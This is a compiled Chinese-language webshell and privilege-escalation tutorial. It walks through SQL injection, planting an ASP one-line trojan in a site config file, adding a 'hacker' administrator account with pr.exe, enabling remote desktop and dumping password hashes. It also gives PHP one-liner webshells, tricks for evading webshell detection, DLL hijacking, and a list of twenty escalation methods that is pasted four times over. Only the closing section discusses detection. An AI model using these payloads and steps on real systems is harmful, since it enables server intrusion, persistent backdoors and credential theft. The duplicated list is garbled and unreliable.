九种经典的Webshell提权

获取webshell后,上传一句话木马,通过中国菜刀连接启动3389服务,添加管理员账户,获取目标主机的权限获取webshell插入一句话木马的方法有很多,不一定是通过sql注入.从中国菜刀连接上靶机后,获取服务器权限的步骤方式都一样Setp 0实验环境操作机：Windows XP目标机：Windows server 2003实验工具：中国菜刀 Pr 御剑 Pangolin 3389本实验要求获取网站的服务器权限.Step 1目录扫描工具：御剑路径：C:\Tools\目录扫描\打开御剑,在域名中输入,开始扫描；在目录列表中查找后台,发现存在/admin双击打开后台登录页面不过用户名和密码都不知道,没关系,进行下一步：获取用户名和密码.Step 2工具：旁注WEB综合检测程序修正版路径：C:\Tools\注入工具\\打开工具,依次点击 SQL注入 -->批量扫描注入点 --> 添加网址 --> 批量分析注入点；出现下面这个对话框说明已经检测完毕；点击OK进行下一步；注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择检测注入；点击检测注入后,主界面从批量扫描注入点转到 SQL注入猜解检测,点击开始检测；检测完毕后,显示可以注入,并列出了数据库类型：Access 数据库；下面开始逐步猜解表名 -->猜解列名--> 猜解内容；点击猜解表名后,在数据库列表中会显示4个表,分别是admin、user、movie和news；选择admin表,点击猜解列名,成功猜解出三个列名id、username和password；勾选username和password,点击猜解内容,右侧列表中成功显示用户名admin,密码469e80d32c0559f8当然密码是MD5加密的,打开本机浏览器,输入,输入刚刚查询到的密文,点击解密；成功找到明文密码：admin888；注入的方法与工具很多,或者也可以这样：在浏览器中打开网站首页,在最新产品中随便选择一个打开注入点太多；复制URL ,使用工具：穿山甲工具：穿山甲Pangolin路径： C:\Tools\注入工具\pangolinPangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具.所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法；打开穿山甲,输入URL,点击绿色三角箭头进行注入操作；点击 Dates 切换到Dates选项卡,点击 Tables 成功猜解出4张表；获取内容的原理同Domain的使用方法一样,猜解表名-->猜解列名-->猜解内容；同样能获取用户名和密码；下一步：登录后台,上传木马；Setp 3打开后台登录页面,输入用户名admin,密码admin888,输入验证码,点击 ENTER 登录后台；久违的后台终于进去了….点击左侧菜单栏中的系统设置管理-->网站信息配置,用修改配置文件的方法获取WebShell；打开相应页面后,将公司名称内容修改为一句话木马"%><%Eval RequestChr35%><%'写一句话木马的时候注意闭合；点击最下面的保存设置按钮；如果插马成功,公司名称内容为空；打开中国菜刀连接一句话木马；工具：中国菜刀路径：C:\Tools\webshell\中国菜刀打开菜刀,右键空白处,选择添加；在地址栏中输入,为什么是这个路径因为我们刚才修改的网站信息配置页面,就是这个路径,可以自己下载一个魅力企业网站管理系统源码看看,2007或2009版的都行,里面的目录结构一目了然；连接密码为,密码为什么是往上看一句话木马,里面有个chr35,的ascii码就是35,当然这个密码可以随便设置,只要保证服务端一句话木马里的密码和添加SHELL时输入的密码一致即可,点击添加；添加成功后会新增一条记录；双击这个URL,成功进入解释一下一句话木马/inc/的源码是这样的：1.<%2.Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码构造一句话木马：1."%><%Eval RequestChr35%><%'复制代码插入一句话木马后,代码会变成这样：1.<%2.Const SiteName=""%><%Eval RequestChr35%><%'" '网站名称3.Const EnSiteName="MSCOM 2007" '网站名称4.Const SiteTitle="魅力软件" '网站标题5.Const EnSiteTitle="MelyySoft" '网站标题6.Const SiteUrl="" '网站地址7.Const Miibeian="湘ICP备05011184号" '网站备案号8.….9.%>复制代码代码再整理规范一点就是这样：1.<%Const SiteName=""%>2.<%Eval RequestChr35%>3.<% '" '网站名称4.Const EnSiteName="MSCOM 2007" '网站名称5.Const SiteTitle="魅力软件" '网站标题6.Const EnSiteTitle="MelyySoft" '网站标题7.Const SiteUrl="" '网站地址8.Const Miibeian="湘ICP备05011184号" '网站备案号9.….10.%>复制代码所以插入一句话木马一定要保证整个代码的语法是正确的,否则肯定不成功；下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码；Step 4进入C:\RECYCLER目录,准备上传提权工具；当然可写的目录不知这一个,还有其他的；提权工具包括pr,3389,cmd,路径：C:\Tools\提权工具\windows开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传；上传成功；提权Windows跟踪注册表项的ACL权限提升漏洞KB952004MS09-012Windows管理规范WMI提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源.WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程.一旦找到了SYSTEM 令牌,就可以获得SYSTEM权限的提升.使用方法：1. "net user hacker 123 /add & net localgroupadministrators hacker /add"复制代码net user hacker 123 /add添加一个用户名为hacker、密码为123的账户；net localgroup administrators hacker /add将账户hacker添加到管理员组；提权有很多种,如巴西烤肉等；下一步,执行提权操作；右键,选择虚拟终端成功进入,将目录切换到C:\RECYCLER用执行cmd命令,添加账户；1.pr "net user hacker 123 /add"复制代码第一次执行命令有可能不成功,怎么办没关系,再执行一次就OK了；账户添加成功,下一步,将hacker账户添加到系统管理员组；1.pr "net localgroup administrators hacker/add"复制代码添加成功,下一步,开启3389；1.pr 3389复制代码如果出现如上图中的一大堆命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机；开始-->运行-->mstsc如果找不见目标IP地址,请点击右上角场景拓扑图进行查看：输入目标IP地址：,开始连接,继续输入用户名hacker和密码123,进入系统；3389连接成功下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 ,还是使用菜刀上传；工具一大堆,随便用,这里我们使用QuarksPwDum,开始上传；上传成功,进入目标机,运行QuarksPwDump注：打开cmd,用命令行启动QuarksPwDump,不要直接双击；运行后,会出现如下界面：继续输入命令：1.QuarksPwDump --dump-hash-local 复制代码执行后的结果如下：成功获取到administrator的hash：62C4700EBB05958F3832C92FC614B7D1:4D4541AACCF6CF33E1 DD9D85暂时切换出实验环境,在你的电脑上打开浏览器输入,在页面的相应位置输入hash,然后GO；ps：如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站点很多；最终结果输出：___________________________________________________ ___________________________________________________ _____________________________________WVSWVS Web Vulnerability Scanner 是一个自动化的Web应用程序安全测试工具.官网：1、WVS可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序.2、它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序.3、除了自动化地扫描可以利用的漏洞,WVS还提供了分析现有通用产品和客户定制产品包括那些依赖于JavaScript的程序即AJAX应用程序的一个强健的解决方案.4、登录保护页面的自动扫描 .一个网站最有可能被攻击和容易受到攻击的区域往往是那些需要用户登录的区域.因此对的Acunetix最新版本现在可以自动地和轻松浏览复杂的验证区域,不再需要经常需要手动干预.这包括可以扫描使用单点登录SSO和基于OAuth认证的Web应用程序.5、检测WP核心和WP插件的漏洞. 可以检测超过1200个WordPress 核心和插件的漏洞,目前全球市场上没有其他扫描器可以检测这么多的WordPress漏洞.WordPress网站已经超过了7400万,在WordPress核心发现一个漏洞,或甚至在某一个插件的漏洞都可用于攻击数百万的个人网站.6、支持各种开发架构和Web服务 .许多企业级,任务关键的应用程序基本都是使用Java框架或Ruby on Rails建立的.第10版经过精心设计,可精确抓取扫描和使用这些技术构建的Web应用程序.另外随着不断上升的HTML5单页面的应用程序和移动应用,Web服务已经成为一个显着的攻击向量.新版本改进了对使用WSDL和WCF描述基于SOAP的Web 服务支持,使用WADL定义自动扫描RESTful Web服务.其“深度扫描”爬行引擎可以非常迅速的分析同时使用Java 框架和Ruby on Rails开发的Web应用程序.7、检测恶意软件和钓鱼网址 Acunetix WVS 10将附带一个URL的恶意软件检测服务,这是用来分析所有的扫描过程中找到的外部链接,针对不断更新的恶意软件和钓鱼网址数据库,这项恶意软件检测服务利用了谷歌和Yandex的安全浏览数据库.8、支持外部第三方工具.如Fiddler、Burp Suite和Selenium IDE,以加强业务逻辑测试和手动测试和自动化的工作流.界面：报告输出：本次实验到此结束。

后台拿webshell的常用方法总结PS：上传不易，望请下载！一、直接上传获得webshell这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文件url应该是http://forums/images/smiles/下，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。

文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。

以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目录中，从而拿到网站的管理员控制权限。

二、添加修改上传类型现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa|asP类型，ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp，可以添加.aspasp 的文件类型来上传获得webshell。

php系统的后台，我们可以添加.php.g1f的上传类型，这是php的一个特性,最后的哪个只要不是已知的文件类型即可，php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。

LeadBbs3.14后台获得webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！三、利用后台管理功能写入webshell上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。

比较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置文件，写入后缀是asp的文件。

而LeadBbs3.14后台获得webshell另一方法是：添加一个新的友情链接，在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。

webshell的分类Webshell是一种将恶意代码嵌入到受攻击的服务器中的远程管理工具。

它可以允许攻击者通过网络连接到服务器，并执行系统命令、文件管理、网络监听等操作。

由于其便携性和隐蔽性，Webshell广泛应用于黑客攻击和恶意活动中。

Webshell可以根据特点和功能的不同进行分类。

下面将就其常见的分类进行介绍。

1. 命令执行型(Web Command Shell)：这是最基本的Webshell类型，它允许攻击者执行操作系统命令。

攻击者可以通过Web界面发送特定的命令，例如（system/exec/shell/exec），然后在受攻击的服务器上执行命令并返回结果。

这种类型的Webshell非常隐秘，因为它们隐藏在正常的Web程序中，攻击者需要找到一个能够执行命令的入口。

2. 文件管理型(Web File Manager Shell)：这种类型的Webshell允许攻击者浏览、编辑、上传、下载和删除文件。

攻击者可以通过Web界面查看服务器上的文件、修改网站内容，甚至上传和执行其他恶意文件。

这种Webshell通常包含文件管理器的完整功能，使攻击者能够更轻松地操作受攻击的服务器。

3. 功能丰富型(Webshell with Rich Functionality)：这种类型的Webshell提供了更丰富的功能，例如系统信息查询、数据库管理、远程端口扫描、网络监听等。

攻击者可以利用这些功能来获取更多的信息，进一步深入攻击目标系统。

4. 木马型(Webshell Trojan)：这种类型的Webshell将自己伪装成正常的文件或进程，以逃避杀毒软件和其他安全监测工具的检测。

当攻击者访问Webshell时，它会自动激活并执行恶意代码。

这种Webshell通常具有自动持久性和自我复制功能，以确保其在服务器上的存活和传播。

5. 反弹型(Webshell Backdoor)：这种类型的Webshell使用反向连接技术，攻击者可以通过Web界面连接到被攻击的服务器，而不是等待服务器主动连接。

常见的webshell检测方法及绕过思路一句话webshell基本结构：<?php eval($_POST[‘a’]);?>两个步骤：数据的传递、执行所传递的数据数据的传递&绕过检测对于数据的传递，我们通常的做法是$_GET/$_POST/$_SERVER/$_COOKIE等获取客户端数据，但是这类关键词直接出现的话，可以很容易回溯到，我们有以下集中方案来解决：1.利用本身所在的框架2.利用变种：${“_G”.”ET”}。

不过这种不过这种方式也有自身的缺点，可以跟踪“${”；不过这种跟踪又可以通过“$/*a*/{”这种方式绕过（当然其又有被跟踪的可能性）。

3.使用其他数据获取方式来获取数据，譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。

4.人为构造语言缺陷或应用漏洞，并且这种缺陷是不易察觉的，譬如伪造管理员session等。

数据执行&绕过检测对于数据执行，我们通常使用的函数或方式有：eval、create_function、``、exec、preg_replace等。

当然这类关键词如果直接出现的话，我们的自动化webshell检测脚本可以很轻易的进行识别，目前看我们可以绕过检测的方案较少：1、通过$a()这种方式来执行函数。

不过这种方式也有自身规律在里面，有很多扫描器已经内置了“$.*($.*”这种规则，同样我们可以通过$a/*a*/()这种方式以及相应的变通方式来绕过。

（当然其又有被跟踪的可能性）2、尝试去找到不在黑名单中的函数，或者极其常见的函数。

两句话webshell$a = $_GET[‘a’];eval($a);这没有任何意义。

而是说采取一些方式，隐藏数据传递者和数据执行者。

这里简单举一个例子，譬如我们在a.php中插入了这样的代码，以便在必要时生成一个shell文件：file_put_contents(“/home/www/abc.txt”, str_rot13 (‘some code already encode’));然后我们在b.php中再实现一个数据执行者，最简单的莫过于：include “/home/www/abc.txt”;此外我们还可以使用virtual、php_check_syntax、array_filter、array_map、array_walk、call_user_func、preg_replace、usort等一般不在黑名单中的函数来绕过shell脚本检测，或者直接在应用代码中找上述的函数，看其所引用的变量是否可以稍加改变变成我们的数据提供者。

webshell提权20种思路1，SER-TU提权（通常是利⽤SERFTP服务器管理⼯具，⾸先要在安装⽬录下找到INI配置⽂件，必须具备可写⼊的权限）2，RADMIN提权（⼤家并不陌⽣，我们在扫描4899空⼝令后，同样需要他来连接）3，PCANYWHRER提权（也是远程客户端软件，下载安装⽬录的CIF⽂件进⾏破解）4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM⽂件，然后进⾏HASH破解）5，NC提权（利⽤NC命令，反弹⼀个端⼝，然后TELNET远程去连接⼀个端⼝，虽然权限不够⼤，但结合巴西烤⾁，也是能够成功的）6，PR提权（PR提权，这个就不多说了，最好是免杀的PR⼤杀器，这样更⽅⾯我们去操作）7，IIS提权（IIS6.0提权，⾸先需要获取IIS的配置信息，利⽤⼯具进⾏添加后门⽤户）8，43958提权（如果SER-TU有直接读⼊和执⾏的权限，那么我们就可以直接提权）9，PERL提权（PERL提权通常是针对PERL⽂件夹下的提权⽅式，利⽤DIR⽬录%20NET USER这样来建⽴后门⽤户）10，内⽹LCX提权（转发⼯具LCX，通常需要先本地监听⼀个端⼝，然后转发，针对内⽹，⽤本地的127连接对⽅的3389）11，启动提权（如果服务器启动项有能够执⾏的权限，那么应该说管理员的技术肯定不精湛）12，替换服务提权（替换某个服务EXE，⽐如SER-TU，可将原有的删除，再传⼀个同样的SER.EXE上去，等待服务器重启）13，FXP提权（FXP这个⼯具其实本⾝他是⼀个传输⼯具，但我们可以下载他的三个⽂件，然后，⽤密码查看器的功能去获得密码）14，输⼊法提权（⽬前来说的话，输⼊法提权的思路基本上不太可⾏了）15，360提权（360提权，也就是我们常说的SHIFT后门，如果执⾏了360漏洞利⽤程序，连接服务器⽤SHIFT5下，弹出了CMDSHELL即为成功）16，VNC提权（VNC，想必⼤家并不陌⽣，我们通常是扫描5900国外服务器时候⽤到VNC来连接的，同样，我们如果得到了VNC的密码，通常可以利⽤他来提权）17，2003ODAY提权（如果服务器是2003的，那么就可以利⽤2003ODAY利⽤⼯具来进⾏提权了）18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导⼊注册表的⽅式，利⽤MSSQL语句执⾏我们想要的命令了）19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，⽐如CONFIG.ASP,CONN.ASP等等)20，FTP溢出提权(这个⽤到LCX⼯具，本地溢出，转发⼀个端⼝，虽然不是内⽹，利⽤默认的21进⾏提升权限）1，SER-TU提权（通常是利⽤SERFTP服务器管理⼯具，⾸先要在安装⽬录下找到INI配置⽂件，必须具备可写⼊的权限）2，RADMIN提权（⼤家并不陌⽣，我们在扫描4899空⼝令后，同样需要他来连接）3，PCANYWHRER提权（也是远程客户端软件，下载安装⽬录的CIF⽂件进⾏破解）4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM⽂件，然后进⾏HASH破解）5，NC提权（利⽤NC命令，反弹⼀个端⼝，然后TELNET远程去连接⼀个端⼝，虽然权限不够⼤，但结合巴西烤⾁，也是能够成功的）6，PR提权（PR提权，这个就不多说了，最好是免杀的PR⼤杀器，这样更⽅⾯我们去操作）7，IIS提权（IIS6.0提权，⾸先需要获取IIS的配置信息，利⽤⼯具进⾏添加后门⽤户）8，43958提权（如果SER-TU有直接读⼊和执⾏的权限，那么我们就可以直接提权）9，PERL提权（PERL提权通常是针对PERL⽂件夹下的提权⽅式，利⽤DIR⽬录%20NET USER这样来建⽴后门⽤户）10，内⽹LCX提权（转发⼯具LCX，通常需要先本地监听⼀个端⼝，然后转发，针对内⽹，⽤本地的127连接对⽅的3389）11，启动提权（如果服务器启动项有能够执⾏的权限，那么应该说管理员的技术肯定不精湛）12，替换服务提权（替换某个服务EXE，⽐如SER-TU，可将原有的删除，再传⼀个同样的SER.EXE上去，等待服务器重启）13，FXP提权（FXP这个⼯具其实本⾝他是⼀个传输⼯具，但我们可以下载他的三个⽂件，然后，⽤密码查看器的功能去获得密码）14，输⼊法提权（⽬前来说的话，输⼊法提权的思路基本上不太可⾏了）15，360提权（360提权，也就是我们常说的SHIFT后门，如果执⾏了360漏洞利⽤程序，连接服务器⽤SHIFT5下，弹出了CMDSHELL即为成功）16，VNC提权（VNC，想必⼤家并不陌⽣，我们通常是扫描5900国外服务器时候⽤到VNC来连接的，同样，我们如果得到了VNC的密码，通常可以利⽤他来提权）17，2003ODAY提权（如果服务器是2003的，那么就可以利⽤2003ODAY利⽤⼯具来进⾏提权了）18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导⼊注册表的⽅式，利⽤MSSQL语句执⾏我们想要的命令了）19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，⽐如CONFIG.ASP,CONN.ASP等等)20，FTP溢出提权(这个⽤到LCX⼯具，本地溢出，转发⼀个端⼝，虽然不是内⽹，利⽤默认的21进⾏提升权限）1，SER-TU提权（通常是利⽤SERFTP服务器管理⼯具，⾸先要在安装⽬录下找到INI配置⽂件，必须具备可写⼊的权限）2，RADMIN提权（⼤家并不陌⽣，我们在扫描4899空⼝令后，同样需要他来连接）3，PCANYWHRER提权（也是远程客户端软件，下载安装⽬录的CIF⽂件进⾏破解）4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM⽂件，然后进⾏HASH破解）5，NC提权（利⽤NC命令，反弹⼀个端⼝，然后TELNET远程去连接⼀个端⼝，虽然权限不够⼤，但结合巴西烤⾁，也是能够成功的）6，PR提权（PR提权，这个就不多说了，最好是免杀的PR⼤杀器，这样更⽅⾯我们去操作）7，IIS提权（IIS6.0提权，⾸先需要获取IIS的配置信息，利⽤⼯具进⾏添加后门⽤户）8，43958提权（如果SER-TU有直接读⼊和执⾏的权限，那么我们就可以直接提权）9，PERL提权（PERL提权通常是针对PERL⽂件夹下的提权⽅式，利⽤DIR⽬录%20NET USER这样来建⽴后门⽤户）10，内⽹LCX提权（转发⼯具LCX，通常需要先本地监听⼀个端⼝，然后转发，针对内⽹，⽤本地的127连接对⽅的3389）11，启动提权（如果服务器启动项有能够执⾏的权限，那么应该说管理员的技术肯定不精湛）12，替换服务提权（替换某个服务EXE，⽐如SER-TU，可将原有的删除，再传⼀个同样的SER.EXE上去，等待服务器重启）13，FXP提权（FXP这个⼯具其实本⾝他是⼀个传输⼯具，但我们可以下载他的三个⽂件，然后，⽤密码查看器的功能去获得密码）14，输⼊法提权（⽬前来说的话，输⼊法提权的思路基本上不太可⾏了）15，360提权（360提权，也就是我们常说的SHIFT后门，如果执⾏了360漏洞利⽤程序，连接服务器⽤SHIFT5下，弹出了CMDSHELL即为成功）16，VNC提权（VNC，想必⼤家并不陌⽣，我们通常是扫描5900国外服务器时候⽤到VNC来连接的，同样，我们如果得到了VNC的密码，通常可以利⽤他来提权）17，2003ODAY提权（如果服务器是2003的，那么就可以利⽤2003ODAY利⽤⼯具来进⾏提权了）18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导⼊注册表的⽅式，利⽤MSSQL语句执⾏我们想要的命令了）19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，⽐如CONFIG.ASP,CONN.ASP等等)20，FTP溢出提权(这个⽤到LCX⼯具，本地溢出，转发⼀个端⼝，虽然不是内⽹，利⽤默认的21进⾏提升权限）1，SER-TU提权（通常是利⽤SERFTP服务器管理⼯具，⾸先要在安装⽬录下找到INI配置⽂件，必须具备可写⼊的权限）2，RADMIN提权（⼤家并不陌⽣，我们在扫描4899空⼝令后，同样需要他来连接）3，PCANYWHRER提权（也是远程客户端软件，下载安装⽬录的CIF⽂件进⾏破解）4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM⽂件，然后进⾏HASH破解）5，NC提权（利⽤NC命令，反弹⼀个端⼝，然后TELNET远程去连接⼀个端⼝，虽然权限不够⼤，但结合巴西烤⾁，也是能够成功的）6，PR提权（PR提权，这个就不多说了，最好是免杀的PR⼤杀器，这样更⽅⾯我们去操作）7，IIS提权（IIS6.0提权，⾸先需要获取IIS的配置信息，利⽤⼯具进⾏添加后门⽤户）8，43958提权（如果SER-TU有直接读⼊和执⾏的权限，那么我们就可以直接提权）9，PERL提权（PERL提权通常是针对PERL⽂件夹下的提权⽅式，利⽤DIR⽬录%20NET USER这样来建⽴后门⽤户）10，内⽹LCX提权（转发⼯具LCX，通常需要先本地监听⼀个端⼝，然后转发，针对内⽹，⽤本地的127连接对⽅的3389）11，启动提权（如果服务器启动项有能够执⾏的权限，那么应该说管理员的技术肯定不精湛）12，替换服务提权（替换某个服务EXE，⽐如SER-TU，可将原有的删除，再传⼀个同样的SER.EXE上去，等待服务器重启）13，FXP提权（FXP这个⼯具其实本⾝他是⼀个传输⼯具，但我们可以下载他的三个⽂件，然后，⽤密码查看器的功能去获得密码）14，输⼊法提权（⽬前来说的话，输⼊法提权的思路基本上不太可⾏了）15，360提权（360提权，也就是我们常说的SHIFT后门，如果执⾏了360漏洞利⽤程序，连接服务器⽤SHIFT5下，弹出了CMDSHELL即为成功）16，VNC提权（VNC，想必⼤家并不陌⽣，我们通常是扫描5900国外服务器时候⽤到VNC来连接的，同样，我们如果得到了VNC的密码，通常可以利⽤他来提权）17，2003ODAY提权（如果服务器是2003的，那么就可以利⽤2003ODAY利⽤⼯具来进⾏提权了）18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导⼊注册表的⽅式，利⽤MSSQL语句执⾏我们想要的命令了）19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，⽐如CONFIG.ASP,CONN.ASP等等)20，FTP溢出提权(这个⽤到LCX⼯具，本地溢出，转发⼀个端⼝，虽然不是内⽹，利⽤默认的21进⾏提升权限）。

WEBSHELL权限提升技巧WEBSHELL权限提升技巧c: d: e:.....C:\Documents and Settings\All Users\「开始」菜单\程序\看这⾥能不能跳转，我们从这⾥可以获取好多有⽤的信息⽐如Serv-U的路径，C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个⽬录，如果⾏那就最好了，直接下它的CIF⽂件，破解得到pcAnywhere密码，登陆c:\Program Files\serv-u\C:\WINNT\system32\config\下它的SAM，破解密码c:\winnt\system32\inetsrv\data\是erveryone 完全控制，很多时候没作限制，把提升权限的⼯具上传上去，然后执⾏c:\prelC:\Program Files\Java Web Start\c:\Documents and Settings\C:\Documents and Settings\All Users\c:\winnt\system32\inetsrv\data\c:\Program Files\c:\Program Files\serv-u\C:\Program Files\Microsoft SQL Server\c:\Temp\c:\mysql\(如果服务器⽀持PHP）c:\PHP(如果服务器⽀持PHP）运⾏"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限还可以⽤这段代码试提升，好象不是很理想的如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写⼊bat，vbs等⽊马。

什么是DLL劫持DLL劫持在破解逆向程序时是常用的，我们同样可以用于Webshell提权。

●DLL劫持产生的原因●先来看一下，DLL劫持的原因。

1、Windows的DLL称为动态链接库，动态链接库技术的本质实际上是将可执行文件与库文件分离，DLL库文件通过导出表提供API接口，PE加载器通过exe文件的导入表加载相应的DLL，并根据exe文件中的INT查询DLL中的函数地址，同时写入IA T。

2、当PE加载器根据exe文件的导入表加载DLL文件时，它会按照程序的当前目录-->system32目录-->windows目录-->PA TH环境变量设置的目录来依次查找要加载的DLL文件。

因此，我们可以在伪造一个导入表同名的DLL文件，放置到exe文件的目录中，让PE加载器加载我们伪造的DLL文件，从而实现劫持。

3、DLL的转发器功能为我们提供了必要的条件，所谓DLL转发器功能是将对某个DLL文件的导出函数调用转到另一个DLL文件的导出函数中。

类似于下面的代码：★//xxx.dll#pragma comment(linker, "/EXPORT:MessageBoxA = user32.MessageBoxA")★即xxx.dll中有一个MessageBoxA导出函数，当调用xxx.dll中的MessageBoxA时，实际上调用的是user32.dll中的导出函数MessageBoxA。

如果我们伪造exe文件所加载DLL中的一个并将伪造的DLL文件放置在exe文件目录中，同时转发其所有的函数调用（转发到正常的系统DLL文件函数调用中），就可以做一些有意思的事情。

●实战●上面是理论，下面来实践一下，以Win2003为例，定位到Iexplore.exe的目录，随便建立一个文件命名为usp10.dll，然后运行iexplore.exe直接运行IE提示出错基本可以确定iexplore.exe加载usp10.dll，要确定一个可执行文件加载哪些DLL有时候单纯的查看导入表是不可取的，最好的办法用OD加载程序，ALT+L查看加载记录，如图2所示，但是需要注意一点，系统的一些关键DLL比如kernel32.dll、ntdll.dll无法劫持。

【web提权】1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功，3389没开的情况下，上传开3389的vps没成功时，试试上传rootkit.asp 用刚提权的用户登录进去就是system权限，再试试一般就可以了。

3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe//cmd.txt 都可以。

4.cmd命令：systeminfo，看看有没有KB952004、KB956572、KB970483这三个补丁，如果没有，第一个是pr提权，第二个是巴西烤肉提权，第三个是iis6.0提权。

6.c:\windows\temp\cookies\ 这个目录7.找sa密码或是root密码，直接利用大马的文件搜索功能直接搜索，超方便！8.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:\RECYCLER\pr.exe，命令那里清空(包括/c )输入”net user jianmei daxia /add”9.增加用户并提升为管理员权限之后，如果连接不上3389，上传rootkit.asp脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。

10.有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码(hash值)”，俩个都上传，执行PwDump7.exe就可以了，之后到网站去解密即可。

11.有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令tasklist 查看进程12.其实星外提权只要一个可执行的文件即可，先运行一遍cmd，之后把星外ee.exe命名为log.csv 就可以执行了。

13.用wt.asp扫出来的目录，其中红色的文件可以替换成exp，执行命令时cmd那里输入替换的文件路径，下面清空双引号加增加用户的命令。

原创BeatRex2023-08-21原文一、技战法概述Webshell是黑客经常使用的一种后门，其目的是获得服务器的执行操作权限，常见的Webshell编写语言为ASP、JSP、PHP。

主要用于网站管理，服务器管理，权限管理等操作。

使用方法简单，只需要上传一个代码文件，通过网址访问，便可进行很多日常操作，极大地方便了使用者对网站的服务器的管理。

在日常的网络攻击以及实战攻防中，攻击者往往倾向于反序列化攻击、代码执行、命令执行、Webshell上传等攻击成本低但快速有效获取权限的方式。

且随着防御手段的不断提升，对Webshell的检测也在不断深入，从文件落地型Webshell的明文到编码加密传输规避安全设备的检测，当新的绕过手段出现时，不久便会出现对其的检测手段。

现在大部分Webshell利用反序列化漏洞进行无文件落地形式的攻击，即内存马。

内存马这种方式难以检测且需要较高的技术手段进行处置，因此对于Webshell攻击的对抗与检测处置，不仅需要针对文件落地型Webshell 开展对抗，更需要注意无文件的内存马攻击。

二、Webshell对抗手段2.1落地文件型Webshell检测与对抗在安全从业者进入行业的初始阶段，通常会针对文件上传漏洞进行学习，最早接触的Webshell即为一句话木马。

一句话木马短小精悍，仅一行代码即可执行常见的服务器文件操作。

但一句话木马使用的函数为高危函数，极易被安全产品检测，因此出现了base64编码以及其他编码的传输方式，通过蚁剑等Webshell管理工具进行连接实现Webshell的操作。

但编码本质而言是可逆的，通过解码手段即可还原通信过程从而再次被检测，因此目前主流的哥斯拉、冰蝎等加密Webshell出现在常见的攻防实战中。

如冰蝎的动态特征是连接shell的过程中会存在客户端与服务器交换AES密钥的环节，总体的通信流程是将将Payload通过base 64进行编码，通过eval等执行系统命令的函数对编码后的Payload进行执行，通过AES加密全部的Payload，传输获得密钥，再进行加密传输。

